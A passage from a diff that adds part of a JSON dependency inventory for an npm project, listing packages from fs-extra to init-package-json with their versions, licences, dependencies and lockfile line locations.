"Relationship": "indirect", + "DependsOn": [ + "graceful-fs@4.2.11", + "jsonfile@6.2.0", + "universalify@2.0.1" + ], + "Locations": [ + { + "StartLine": 17606, + "EndLine": 17619 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "fs-extra@7.0.1", + "Name": "fs-extra", + "Identifier": { + "PURL": "pkg:npm/fs-extra@7.0.1", + "UID": "a808b705a743d6" + }, + "Version": "7.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "graceful-fs@4.2.11", + "jsonfile@4.0.0", + "universalify@0.1.2" + ], + "Locations": [ + { + "StartLine": 17331, + "EndLine": 17344 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "fs-extra@8.1.0", + "Name": "fs-extra", + "Identifier": { + "PURL": "pkg:npm/fs-extra@8.1.0", + "UID": "9fa75a1d9f4ef885" + }, + "Version": "8.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "graceful-fs@4.2.11", + "jsonfile@4.0.0", + "universalify@0.1.2" + ], + "Locations": [ + { + "StartLine": 9487, + "EndLine": 9501 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "fs-minipass@2.1.0", + "Name": "fs-minipass", + "Identifier": { + "PURL": "pkg:npm/fs-minipass@2.1.0", + "UID": "3c19e9db9bf708cd" + }, + "Version": "2.1.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "minipass@3.3.6" + ], + "Locations": [ + { + "StartLine": 9502, + "EndLine": 9514 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "fs-minipass@3.0.3", + "Name": "fs-minipass", + "Identifier": { + "PURL": "pkg:npm/fs-minipass@3.0.3", + "UID": "3d6697ffc89af520" + }, + "Version": "3.0.3", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "minipass@7.1.2" + ], + "Locations": [ + { + "StartLine": 14355, + "EndLine": 14367 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "fs.realpath@1.0.0", + "Name": "fs.realpath", + "Identifier": { + "PURL": "pkg:npm/fs.realpath@1.0.0", + "UID": "ca3063b5b3a061bc" + }, + "Version": "1.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9535, + "EndLine": 9540 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "fsevents@2.3.3", + "Name": "fsevents", + "Identifier": { + "PURL": "pkg:npm/fsevents@2.3.3", + "UID": "5d088637431dc29d" + }, + "Version": "2.3.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9541, + "EndLine": 9554 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "function-bind@1.1.2", + "Name": "function-bind", + "Identifier": { + "PURL": "pkg:npm/function-bind@1.1.2", + "UID": "fbeed2e24996d68c" + }, + "Version": "1.1.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9555, + "EndLine": 9563 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "gauge@2.7.4", + "Name": "gauge", + "Identifier": { + "PURL": "pkg:npm/gauge@2.7.4", + "UID": "e86339da1ef0298" + }, + "Version": "2.7.4", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "aproba@1.2.0", + "console-control-strings@1.1.0", + "has-unicode@2.0.1", + "object-assign@4.1.1", + "signal-exit@3.0.7", + "string-width@1.0.2", + "strip-ansi@3.0.1", + "wide-align@1.1.5" + ], + "Locations": [ + { + "StartLine": 17345, + "EndLine": 17361 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "gauge@4.0.4", + "Name": "gauge", + "Identifier": { + "PURL": "pkg:npm/gauge@4.0.4", + "UID": "6f6ac98d53a4064d" + }, + "Version": "4.0.4", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "aproba@1.2.0", + "color-support@1.1.3", + "console-control-strings@1.1.0", + "has-unicode@2.0.1", + "signal-exit@3.0.7", + "string-width@4.2.3", + "strip-ansi@6.0.1", + "wide-align@1.1.5" + ], + "Locations": [ + { + "StartLine": 9595, + "EndLine": 9615 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "generator-function@2.0.1", + "Name": "generator-function", + "Identifier": { + "PURL": "pkg:npm/generator-function@2.0.1", + "UID": "24536271da375f31" + }, + "Version": "2.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9616, + "EndLine": 9624 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "gensync@1.0.0-beta.2", + "Name": "gensync", + "Identifier": { + "PURL": "pkg:npm/gensync@1.0.0-beta.2", + "UID": "876caab0a123c17" + }, + "Version": "1.0.0-beta.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9625, + "EndLine": 9633 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "get-caller-file@2.0.5", + "Name": "get-caller-file", + "Identifier": { + "PURL": "pkg:npm/get-caller-file@2.0.5", + "UID": "6f58b9fd1e968fc3" + }, + "Version": "2.0.5", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9634, + "EndLine": 9642 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "get-intrinsic@1.3.0", + "Name": "get-intrinsic", + "Identifier": { + "PURL": "pkg:npm/get-intrinsic@1.3.0", + "UID": "94dcf3c9b1085a16" + }, + "Version": "1.3.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "call-bind-apply-helpers@1.0.2", + "es-define-property@1.0.1", + "es-errors@1.3.0", + "es-object-atoms@1.1.1", + "function-bind@1.1.2", + "get-proto@1.0.1", + "gopd@1.2.0", + "has-symbols@1.1.0", + "hasown@2.0.2", + "math-intrinsics@1.1.0" + ], + "Locations": [ + { + "StartLine": 9643, + "EndLine": 9666 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "get-package-type@0.1.0", + "Name": "get-package-type", + "Identifier": { + "PURL": "pkg:npm/get-package-type@0.1.0", + "UID": "42c951050af2f5ee" + }, + "Version": "0.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9667, + "EndLine": 9675 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "get-proto@1.0.1", + "Name": "get-proto", + "Identifier": { + "PURL": "pkg:npm/get-proto@1.0.1", + "UID": "8cc9c0f81c8f1bea" + }, + "Version": "1.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "dunder-proto@1.0.1", + "es-object-atoms@1.1.1" + ], + "Locations": [ + { + "StartLine": 9676, + "EndLine": 9688 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "get-stream@6.0.1", + "Name": "get-stream", + "Identifier": { + "PURL": "pkg:npm/get-stream@6.0.1", + "UID": "22b39c2a84d3626e" + }, + "Version": "6.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9689, + "EndLine": 9700 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "getenv@2.0.0", + "Name": "getenv", + "Identifier": { + "PURL": "pkg:npm/getenv@2.0.0", + "UID": "eca0e77ba2246a0b" + }, + "Version": "2.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9719, + "EndLine": 9727 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "github-from-package@0.0.0", + "Name": "github-from-package", + "Identifier": { + "PURL": "pkg:npm/github-from-package@0.0.0", + "UID": "2adcad7e983324e3" + }, + "Version": "0.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9728, + "EndLine": 9733 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "glob@10.4.5", + "Name": "glob", + "Identifier": { + "PURL": "pkg:npm/glob@10.4.5", + "UID": "9116516bc1102054" + }, + "Version": "10.4.5", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "foreground-child@3.3.1", + "jackspeak@3.4.3", + "minimatch@9.0.5", + "minipass@7.1.2", + "package-json-from-dist@1.0.1", + "path-scurry@1.11.1" + ], + "Locations": [ + { + "StartLine": 2329, + "EndLine": 2348 + }, + { + "StartLine": 15018, + "EndLine": 15036 + }, + { + "StartLine": 17506, + "EndLine": 17525 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "glob@11.0.3", + "Name": "glob", + "Identifier": { + "PURL": "pkg:npm/glob@11.0.3", + "UID": "fc64b08e36648e84" + }, + "Version": "11.0.3", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "foreground-child@3.3.1", + "jackspeak@4.1.1", + "minimatch@10.0.3", + "minipass@7.1.2", + "package-json-from-dist@1.0.1", + "path-scurry@2.0.0" + ], + "Locations": [ + { + "StartLine": 14368, + "EndLine": 14389 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "glob@7.2.3", + "Name": "glob", + "Identifier": { + "PURL": "pkg:npm/glob@7.2.3", + "UID": "d77cb6c2f8bc2013" + }, + "Version": "7.2.3", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "fs.realpath@1.0.0", + "inflight@1.0.6", + "inherits@2.0.4", + "minimatch@3.1.2", + "once@1.4.0", + "path-is-absolute@1.0.1" + ], + "Locations": [ + { + "StartLine": 9734, + "EndLine": 9754 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "glob@9.3.5", + "Name": "glob", + "Identifier": { + "PURL": "pkg:npm/glob@9.3.5", + "UID": "841e30a3b5be947f" + }, + "Version": "9.3.5", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "fs.realpath@1.0.0", + "minimatch@8.0.7", + "minipass@4.2.8", + "path-scurry@1.11.1" + ], + "Locations": [ + { + "StartLine": 6335, + "EndLine": 6353 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "glob-parent@5.1.2", + "Name": "glob-parent", + "Identifier": { + "PURL": "pkg:npm/glob-parent@5.1.2", + "UID": "2d24535c3d23d170" + }, + "Version": "5.1.2", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "is-glob@4.0.3" + ], + "Locations": [ + { + "StartLine": 9111, + "EndLine": 9122 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "gopd@1.2.0", + "Name": "gopd", + "Identifier": { + "PURL": "pkg:npm/gopd@1.2.0", + "UID": "6536622b9bb6f8ae" + }, + "Version": "1.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9844, + "EndLine": 9855 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "graceful-fs@4.2.11", + "Name": "graceful-fs", + "Identifier": { + "PURL": "pkg:npm/graceful-fs@4.2.11", + "UID": "247ff93ce90375b3" + }, + "Version": "4.2.11", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9856, + "EndLine": 9861 + }, + { + "StartLine": 14390, + "EndLine": 14396 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "hard-rejection@2.1.0", + "Name": "hard-rejection", + "Identifier": { + "PURL": "pkg:npm/hard-rejection@2.1.0", + "UID": "a6404938613a270e" + }, + "Version": "2.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9869, + "EndLine": 9877 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "has-flag@3.0.0", + "Name": "has-flag", + "Identifier": { + "PURL": "pkg:npm/has-flag@3.0.0", + "UID": "97202381621a24dc" + }, + "Version": "3.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 548, + "EndLine": 556 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "has-flag@4.0.0", + "Name": "has-flag", + "Identifier": { + "PURL": "pkg:npm/has-flag@4.0.0", + "UID": "9c9a0d9099b6ec02" + }, + "Version": "4.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9891, + "EndLine": 9899 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "has-property-descriptors@1.0.2", + "Name": "has-property-descriptors", + "Identifier": { + "PURL": "pkg:npm/has-property-descriptors@1.0.2", + "UID": "55652609e3be678a" + }, + "Version": "1.0.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "es-define-property@1.0.1" + ], + "Locations": [ + { + "StartLine": 9900, + "EndLine": 9911 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "has-symbols@1.1.0", + "Name": "has-symbols", + "Identifier": { + "PURL": "pkg:npm/has-symbols@1.1.0", + "UID": "2c05e9e11550d1f6" + }, + "Version": "1.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9928, + "EndLine": 9939 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "has-tostringtag@1.0.2", + "Name": "has-tostringtag", + "Identifier": { + "PURL": "pkg:npm/has-tostringtag@1.0.2", + "UID": "8823f0590abd420e" + }, + "Version": "1.0.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "has-symbols@1.1.0" + ], + "Locations": [ + { + "StartLine": 9940, + "EndLine": 9954 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "has-unicode@2.0.1", + "Name": "has-unicode", + "Identifier": { + "PURL": "pkg:npm/has-unicode@2.0.1", + "UID": "16f2b46333920c9f" + }, + "Version": "2.0.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9955, + "EndLine": 9960 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "hasown@2.0.2", + "Name": "hasown", + "Identifier": { + "PURL": "pkg:npm/hasown@2.0.2", + "UID": "141d6d3acec2cda6" + }, + "Version": "2.0.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "function-bind@1.1.2" + ], + "Locations": [ + { + "StartLine": 9961, + "EndLine": 9972 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "he@1.2.0", + "Name": "he", + "Identifier": { + "PURL": "pkg:npm/he@1.2.0", + "UID": "33769fe8aa7c9316" + }, + "Version": "1.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9973, + "EndLine": 9981 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "hermes-estree@0.29.1", + "Name": "hermes-estree", + "Identifier": { + "PURL": "pkg:npm/hermes-estree@0.29.1", + "UID": "921b8ec558aea854" + }, + "Version": "0.29.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 9982, + "EndLine": 9987 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "hermes-estree@0.32.0", + "Name": "hermes-estree", + "Identifier": { + "PURL": "pkg:npm/hermes-estree@0.32.0", + "UID": "a73a6acef89a6262" + }, + "Version": "0.32.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 12459, + "EndLine": 12464 + }, + { + "StartLine": 12698, + "EndLine": 12703 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "hermes-parser@0.29.1", + "Name": "hermes-parser", + "Identifier": { + "PURL": "pkg:npm/hermes-parser@0.29.1", + "UID": "70d7df2f43da5bb3" + }, + "Version": "0.29.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "hermes-estree@0.29.1" + ], + "Locations": [ + { + "StartLine": 9988, + "EndLine": 9996 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "hermes-parser@0.32.0", + "Name": "hermes-parser", + "Identifier": { + "PURL": "pkg:npm/hermes-parser@0.32.0", + "UID": "4fc682fe279eac6" + }, + "Version": "0.32.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "hermes-estree@0.32.0" + ], + "Locations": [ + { + "StartLine": 12465, + "EndLine": 12473 + }, + { + "StartLine": 12704, + "EndLine": 12712 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "hoist-non-react-statics@3.3.2", + "Name": "hoist-non-react-statics", + "Identifier": { + "PURL": "pkg:npm/hoist-non-react-statics@3.3.2", + "UID": "a442fe0a3b09522c" + }, + "Version": "3.3.2", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "react-is@16.13.1" + ], + "Locations": [ + { + "StartLine": 9997, + "EndLine": 10005 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "hosted-git-info@2.8.9", + "Name": "hosted-git-info", + "Identifier": { + "PURL": "pkg:npm/hosted-git-info@2.8.9", + "UID": "854ce23e43adec12" + }, + "Version": "2.8.9", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 18862, + "EndLine": 18867 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "hosted-git-info@4.1.0", + "Name": "hosted-git-info", + "Identifier": { + "PURL": "pkg:npm/hosted-git-info@4.1.0", + "UID": "c00c65f0d5b36ed9" + }, + "Version": "4.1.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "lru-cache@6.0.0" + ], + "Locations": [ + { + "StartLine": 10012, + "EndLine": 10023 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "hosted-git-info@9.0.2", + "Name": "hosted-git-info", + "Identifier": { + "PURL": "pkg:npm/hosted-git-info@9.0.2", + "UID": "6c01770b6ea32c67" + }, + "Version": "9.0.2", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "lru-cache@11.2.2" + ], + "Locations": [ + { + "StartLine": 14397, + "EndLine": 14409 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "html2canvas@1.4.1", + "Name": "html2canvas", + "Identifier": { + "PURL": "pkg:npm/html2canvas@1.4.1", + "UID": "494b2d291d70587c" + }, + "Version": "1.4.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "css-line-break@2.1.0", + "text-segmentation@1.0.3" + ], + "Locations": [ + { + "StartLine": 10049, + "EndLine": 10061 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "http-cache-semantics@4.2.0", + "Name": "http-cache-semantics", + "Identifier": { + "PURL": "pkg:npm/http-cache-semantics@4.2.0", + "UID": "4add9e1f5d2e7049" + }, + "Version": "4.2.0", + "Licenses": [ + "BSD-2-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10062, + "EndLine": 10068 + }, + { + "StartLine": 14410, + "EndLine": 14416 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "http-errors@2.0.0", + "Name": "http-errors", + "Identifier": { + "PURL": "pkg:npm/http-errors@2.0.0", + "UID": "c2a55b4c7d885022" + }, + "Version": "2.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "depd@2.0.0", + "inherits@2.0.4", + "setprototypeof@1.2.0", + "statuses@2.0.1", + "toidentifier@1.0.1" + ], + "Locations": [ + { + "StartLine": 10069, + "EndLine": 10084 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "http-parser-js@0.5.10", + "Name": "http-parser-js", + "Identifier": { + "PURL": "pkg:npm/http-parser-js@0.5.10", + "UID": "6eceedc03acf71ca" + }, + "Version": "0.5.10", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10094, + "EndLine": 10099 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "http-proxy-agent@4.0.1", + "Name": "http-proxy-agent", + "Identifier": { + "PURL": "pkg:npm/http-proxy-agent@4.0.1", + "UID": "8e57283d93221f66" + }, + "Version": "4.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@tootallnate/once@1.1.2", + "agent-base@6.0.2", + "debug@4.4.3" + ], + "Locations": [ + { + "StartLine": 10100, + "EndLine": 10114 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "http-proxy-agent@7.0.2", + "Name": "http-proxy-agent", + "Identifier": { + "PURL": "pkg:npm/http-proxy-agent@7.0.2", + "UID": "1e2797d36258da43" + }, + "Version": "7.0.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "agent-base@7.1.4", + "debug@4.4.3" + ], + "Locations": [ + { + "StartLine": 14417, + "EndLine": 14430 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "https-proxy-agent@5.0.1", + "Name": "https-proxy-agent", + "Identifier": { + "PURL": "pkg:npm/https-proxy-agent@5.0.1", + "UID": "f540eba6b53860db" + }, + "Version": "5.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "agent-base@6.0.2", + "debug@4.4.3" + ], + "Locations": [ + { + "StartLine": 12174, + "EndLine": 12187 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "https-proxy-agent@7.0.6", + "Name": "https-proxy-agent", + "Identifier": { + "PURL": "pkg:npm/https-proxy-agent@7.0.6", + "UID": "62d9dfbc8efa2d62" + }, + "Version": "7.0.6", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "agent-base@7.1.4", + "debug@4.4.3" + ], + "Locations": [ + { + "StartLine": 10128, + "EndLine": 10140 + }, + { + "StartLine": 14431, + "EndLine": 14444 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "human-signals@2.1.0", + "Name": "human-signals", + "Identifier": { + "PURL": "pkg:npm/human-signals@2.1.0", + "UID": "20a451076a4cd98a" + }, + "Version": "2.1.0", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10141, + "EndLine": 10149 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "humanize-ms@1.2.1", + "Name": "humanize-ms", + "Identifier": { + "PURL": "pkg:npm/humanize-ms@1.2.1", + "UID": "1a51333cffc72513" + }, + "Version": "1.2.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "ms@2.1.3" + ], + "Locations": [ + { + "StartLine": 10150, + "EndLine": 10159 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "iconv-lite@0.4.24", + "Name": "iconv-lite", + "Identifier": { + "PURL": "pkg:npm/iconv-lite@0.4.24", + "UID": "5c55f025f5539772" + }, + "Version": "0.4.24", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "safer-buffer@2.1.2" + ], + "Locations": [ + { + "StartLine": 10160, + "EndLine": 10172 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "iconv-lite@0.6.3", + "Name": "iconv-lite", + "Identifier": { + "PURL": "pkg:npm/iconv-lite@0.6.3", + "UID": "78beb85751f4641e" + }, + "Version": "0.6.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "safer-buffer@2.1.2" + ], + "Locations": [ + { + "StartLine": 8108, + "EndLine": 8119 + }, + { + "StartLine": 14445, + "EndLine": 14458 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "idb@7.1.1", + "Name": "idb", + "Identifier": { + "PURL": "pkg:npm/idb@7.1.1", + "UID": "cef13426ea6d6496" + }, + "Version": "7.1.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10173, + "EndLine": 10178 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "ieee754@1.2.1", + "Name": "ieee754", + "Identifier": { + "PURL": "pkg:npm/ieee754@1.2.1", + "UID": "9f7e5a06a47a5847" + }, + "Version": "1.2.1", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10179, + "EndLine": 10198 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "ignore-walk@8.0.0", + "Name": "ignore-walk", + "Identifier": { + "PURL": "pkg:npm/ignore-walk@8.0.0", + "UID": "ef2347bb81b74665" + }, + "Version": "8.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "minimatch@10.0.3" + ], + "Locations": [ + { + "StartLine": 14459, + "EndLine": 14471 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "image-size@1.2.1", + "Name": "image-size", + "Identifier": { + "PURL": "pkg:npm/image-size@1.2.1", + "UID": "edc104961b5fb2b5" + }, + "Version": "1.2.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "queue@6.0.2" + ], + "Locations": [ + { + "StartLine": 10209, + "EndLine": 10223 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "immediate@3.3.0", + "Name": "immediate", + "Identifier": { + "PURL": "pkg:npm/immediate@3.3.0", + "UID": "37990d112a50807" + }, + "Version": "3.3.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10224, + "EndLine": 10229 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "import-fresh@3.3.1", + "Name": "import-fresh", + "Identifier": { + "PURL": "pkg:npm/import-fresh@3.3.1", + "UID": "d15d14d1e44f0c18" + }, + "Version": "3.3.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "parent-module@1.0.1", + "resolve-from@4.0.0" + ], + "Locations": [ + { + "StartLine": 10230, + "EndLine": 10245 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "imurmurhash@0.1.4", + "Name": "imurmurhash", + "Identifier": { + "PURL": "pkg:npm/imurmurhash@0.1.4", + "UID": "f09319a3463c6ce4" + }, + "Version": "0.1.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10266, + "EndLine": 10274 + }, + { + "StartLine": 14472, + "EndLine": 14481 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "indent-string@4.0.0", + "Name": "indent-string", + "Identifier": { + "PURL": "pkg:npm/indent-string@4.0.0", + "UID": "a58ef672e70b766d" + }, + "Version": "4.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10275, + "EndLine": 10283 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "infer-owner@1.0.4", + "Name": "infer-owner", + "Identifier": { + "PURL": "pkg:npm/infer-owner@1.0.4", + "UID": "fb92d06f527f6b55" + }, + "Version": "1.0.4", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10284, + "EndLine": 10290 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "inflight@1.0.6", + "Name": "inflight", + "Identifier": { + "PURL": "pkg:npm/inflight@1.0.6", + "UID": "eff0e4755f4cdf38" + }, + "Version": "1.0.6", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "once@1.4.0", + "wrappy@1.0.2" + ], + "Locations": [ + { + "StartLine": 10291, + "EndLine": 10301 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "inherits@2.0.4", + "Name": "inherits", + "Identifier": { + "PURL": "pkg:npm/inherits@2.0.4", + "UID": "f60e3c24993947d7" + }, + "Version": "2.0.4", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10302, + "EndLine": 10307 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "ini@1.3.8", + "Name": "ini", + "Identifier": { + "PURL": "pkg:npm/ini@1.3.8", + "UID": "841b5e6e19d348e8" + }, + "Version": "1.3.8", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10308, + "EndLine": 10313 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "ini@5.0.0", + "Name": "ini", + "Identifier": { + "PURL": "pkg:npm/ini@5.0.0", + "UID": "92fb8cbb4c46a19e" + }, + "Version": "5.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 14482, + "EndLine": 14489 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "init-package-json@8.2.2", + "Name": "init-package-json", + "Identifier": { + 